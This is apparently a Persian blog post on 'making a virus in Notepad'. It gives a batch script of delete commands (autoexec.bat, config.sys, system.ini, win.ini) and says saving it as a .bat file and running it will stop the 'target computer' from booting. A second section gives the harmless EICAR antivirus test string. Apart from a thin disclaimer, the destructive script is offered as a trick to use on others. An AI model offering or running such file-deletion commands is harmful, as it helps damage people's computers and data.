آخرین خبرها

ساخت ویروس در نوت پد

توجه! توجه! لازم به ذکر است که این ترفند تنها جنبه آموزشی داشته و هر گونه استفاده نابجا از آن به عهده خود فرد میباشد.

ساخت ویروسی ساده ولی خطرناک! قصد دارم ترفندی خطرناک (!) را به شما معرفی کنیم که با استفاده از آن می توانید بدون نیاز به نرم افزار خاصی و تنها با استفاده از Notepad ویندوز ویروس خطرناکی بسازید.

با اجرای این ویروس ، کامپیوتر مورد نظر Reset شده و دیگر ویندوز آن بالا نمیاید! ابتدا Notepad ویندوز را باز کنید. سپس این عبارت زیر را در داخلش کپی کنید: del autoexec.bat del config.sys cd winnt del system.ini del win.ini سپس فایل رو با پسوند Bat. ذخیره کنید. ……………………………………………………………………………………………………………

ساخت یک ویروس نما! قصد دارم ترفندی متفاوت را به شما معرفی کنیم که با استفاده از آن میتوانید به راحتی و تایپ یک متن کوتاه در نرم افزار notepad ویروسی با نام Eicar بسازید.

این ویروس در حقیقت یک ویروس نمای استاندارد برای تست آنتی ویروسهاست. لازم به ذکر است این ویروس یک ویروس واقعی نیست و در حقیقت یک ویروس نما است و فقط برای تست آنتی ویروس شما مثل یک ویروس عمل میکند.

میتوانید مطمئن باشید که eicar به هیچ وجه به سیستم شما آسیبی نخواهد رساند. برای تکمیل توضیحات فوق باید گفت EICAR مخفف عبارت European Institute for Computer Antivirus Research می باشد.

بدین منظور: ابتدا Notepad را باز کنید و عبارت زیر را در آن وارد کنید. می توانید برای اطمینان و راحتی خودتان از Copy و Paste استفاده کنید: X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* سپس SaveAs را انتخاب و فایل را با پسوند com سیو کنید یعنی با نامی مثل eicar.com به همین راحتی کار تمام است!

5/5 - (1 امتیاز)
نت های پیانو نت های ویولن نت های سنتور نت های گیتار

درباره‌ی vahid ezati

دوست دارم دارم تا تمام چیزی را که می دانم در اختیار بازدید کنندگان وب سایت قرار دهم پیشنهادات و انتقادات شما بنده را خوشحال می کند

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *